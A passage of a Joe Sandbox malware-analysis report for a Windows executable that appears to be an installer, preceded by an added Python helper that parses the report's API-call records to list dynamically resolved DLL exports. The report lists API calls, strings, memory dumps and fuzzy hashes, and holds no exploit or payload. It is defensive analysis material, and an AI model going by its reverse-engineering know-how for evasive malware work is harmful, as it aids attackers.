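Added example, not Joe Sandbox code. It parses lines of the form
    • Api.MODULE(arg,arg,...), ref: ADDRESS
    • String ID: Export$dll.name
as they appear in the report records on this page.
"""
import re
from collections import defaultdict

# Constructed sample input: lines copied from the records above
# (leading whitespace trimmed). Not a complete record.
SAMPLE = """\
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
Similarity
• API ID: AddressHandleModuleProc
• String ID: ShutdownBlockReasonDestroy$user32.dll
APIs
  • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
• LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
• GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
Similarity
• String ID: SHPathPrepareForWriteA$shell32.dll
"""

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
STRING_ID_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>\S.*?)\s*$")
HEX32_RE = re.compile(r"[0-9A-F]{8}")
LOADERS = {"GetModuleHandleA", "LoadLibraryA"}


def parse_api_calls(text):
    """Return one dict per API record line: api, module, args, ref, subcall."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            calls.append({
                "api": m["api"], "module": m["mod"], "ref": m["ref"],
                "subcall": m["sub"],
                "args": [a.strip() for a in m["args"].split(",")],
            })
    return calls


def _is_export_name(s):
    """True for identifier-like export names; rejects '?', raw addresses, DLL names."""
    return bool(re.fullmatch(r"[A-Za-z_]\w*", s)) and not HEX32_RE.fullmatch(s)


def resolved_imports(text):
    """Map DLL name -> sorted list of exports the sample resolves from it.

    The DLL in scope is the first argument of the most recent
    GetModuleHandleA/LoadLibraryA record; export names are taken from the
    argument slot after it, from GetProcAddress's second argument when it is
    a real name, and from the String ID line. Ordering is a heuristic: a
    GetProcAddress record is attributed to the loader record before it.
    """
    found = defaultdict(set)
    current_dll = None
    for call in parse_api_calls(text):
        args = call["args"]
        if call["api"] in LOADERS and args:
            current_dll = args[0].lower()
            if len(args) > 1 and _is_export_name(args[1]):
                found[current_dll].add(args[1])
        elif call["api"] == "GetProcAddress" and len(args) > 1 and current_dll:
            # In the user32/shell32 records the logged second argument is the
            # DLL string rather than the export name; those names are
            # recovered from the String ID line instead.
            if _is_export_name(args[1]):
                found[current_dll].add(args[1])
    for line in text.splitlines():
        m = STRING_ID_RE.match(line)
        if not m:
            continue
        parts = m["ids"].split("$")
        dlls = [p.lower() for p in parts if p.lower().endswith(".dll")]
        names = [p for p in parts if _is_export_name(p)]
        for dll in dlls:
            found[dll].update(names)
    return {dll: sorted(names) for dll, names in found.items()}


if __name__ == "__main__":
    for dll, names in sorted(resolved_imports(SAMPLE).items()):
        print(f"{dll}: {', '.join(names)}")
```

Run against the sample it reports ShutdownBlockReasonDestroy from user32.dll, OpenThemeData and CloseThemeData from uxtheme.dll, and SHPathPrepareForWriteA from shell32.dll. The String ID line is the more reliable source for the single-export records, because the GetProcAddress entries there show the DLL string in the second slot rather than the export name; the subcall records for uxtheme.dll do carry the names in the GetProcAddress arguments, so both paths are needed.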
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
• FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
• Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
• Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
• Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
  • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
• GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CountErrorFileLastMoveTick
• String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
• API String ID: 2406187244-2685451598
• Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
• Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
• Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
• Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDesktopWindow.USER32 ref: 00413D46
• GetDesktopWindow.USER32 ref: 00413DFE
  • Part of subcall function 00418EC0: 6F5BC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
  • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
• SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CursorDesktopWindow$Show
• String ID:
• API String ID: 2074268717-0
• Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
• Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
• Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
• Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
• LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
• LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: LoadString$FileMessageModuleName
• String ID:
• API String ID: 704749118-0
• Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
• Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
• Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
• Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                                                                                                                                                                    • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                                                                                                                                                                  • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                                                                                                                                                                    • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                                                                                                                                                                  • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                                                                                                                                                                  • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
• String ID:
• API String ID: 855768636-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• OffsetRect.USER32(?,?,00000000), ref: 00495988
• OffsetRect.USER32(?,00000000,?), ref: 004959A3
• OffsetRect.USER32(?,?,00000000), ref: 004959BD
• OffsetRect.USER32(?,00000000,?), ref: 004959D8
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: OffsetRect
• String ID:
• API String ID: 177026234-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCursorPos.USER32 ref: 00417260
• SetCursor.USER32(00000000), ref: 004172A3
• GetLastActivePopup.USER32(?), ref: 004172CD
• GetForegroundWindow.USER32(?), ref: 004172D4
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Cursor$ActiveForegroundLastPopupWindow
• String ID:
• API String ID: 1959210111-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
• MulDiv.KERNEL32(?,00000008,?), ref: 00495605
• MulDiv.KERNEL32(?,00000008,?), ref: 00495619
• MulDiv.KERNEL32(?,00000008,?), ref: 00495637
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
• UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
• RegisterClassA.USER32(00499598), ref: 0041F4D4
• SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Class$InfoLongRegisterUnregisterWindow
• String ID:
• API String ID: 4025006896-0
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                                                                                                                                                                  • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(?,00000000), ref: 004705F1
Strings
• Failed to set NTFS compression state (%d)., xrefs: 00470602
• Setting NTFS compression on file: %s, xrefs: 004705BF
• Unsetting NTFS compression on file: %s, xrefs: 004705D7
Similarity
• API ID: ErrorLast
• String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
• API String ID: 1452528299-3038984924
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
Strings
• Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
• Setting NTFS compression on directory: %s, xrefs: 0046FE13
• Failed to set NTFS compression state (%d)., xrefs: 0046FE56
Similarity
• API ID: ErrorLast
• String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
• API String ID: 1452528299-1392080489
Uniqueness

Uniqueness Score: -1.00%

APIs
• Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
• RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
• RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
Similarity
• API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
• String ID:
• API String ID: 4283692357-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: ErrorLast$CountSleepTick
• String ID:
• API String ID: 2227064392-0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 215268677-0
                                                                                                                                                                                                                                  • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                                                                                                                                                  • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                                                                                                                                                                  • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2280970139-0
                                                                                                                                                                                                                                  • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                                                                                                                                                  • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                                                                                                                                                                  • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                  • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                                                                                                                                                  • API String ID: 3535843008-1938159461
                                                                                                                                                                                                                                  • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                                                                                                                                                  • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                                                                                                                                                                  • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Will not restart Windows automatically., xrefs: 004836F6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
